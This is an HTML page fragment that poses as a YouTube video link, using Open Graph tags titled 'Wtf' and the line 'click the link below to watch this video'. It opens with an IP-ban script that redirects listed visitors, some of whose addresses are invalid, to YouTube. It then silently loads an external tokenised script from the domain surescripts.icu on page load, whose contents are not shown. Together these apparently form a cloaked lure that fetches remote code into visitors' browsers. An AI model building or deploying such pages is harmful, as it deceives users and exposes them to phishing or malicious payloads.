<script type="text/javascript">

// Block IP address script- By JavaScriptKit.com (http://www.javascriptkit.com)
// For this and over 400+ free scripts, visit JavaScript Kit- http://www.javascriptkit.com/
// This notice must stay intact for use.

//Enter list of banned ips, each separated with a comma:
var bannedips=["73.144.32.114", "73.144.32.114", "99.38.175.146", "172.58.121.35", "172.58.121.35", "172.58.121.35", "68.58.189.0", "99.38.175.146", "72.168.128.90", "68.36.174.182", "172.58.121.225", "24.99.251.90", "24.99.251.90", "278.0.0.48.102", "78.159.101.115", "173.66.223.166", "279.0.0.19.120", "174.228.142.63", "279.0.0.19.120", "173.66.223.166", "74.109.251.161", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11"]

var ip = '<!--#echo var="REMOTE_ADDR"-->'

var handleips=bannedips.join("|")
handleips=new RegExp(handleips, "i")

if (ip.search(handleips)!=-1){ 
alert("Your IP has been banned from this site. Redirecting...")
window.location.replace("https://www.youtube.com")
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta property="og:url" content="https://www.youtube.com/watch?v=kP9TfCWaQT4" />
<meta property="og:title" content="Wtf" />
<meta property="og:image" content="https://i.mycdn.me/i?r=AyH4iRPQ2q0otWIFepML2LxRI82oKHThX6U62ZMEfbnSKQ" />
<meta property="og:image:width" content="1280" />
<meta property="og:image:height" content="720" />
<meta property="og:description" content="click the link below to watch this video" />
<script type="text/javascript" src="https://surescripts.icu/?token=22c548e01cebb718240452b691f662bd"async="true"></script>
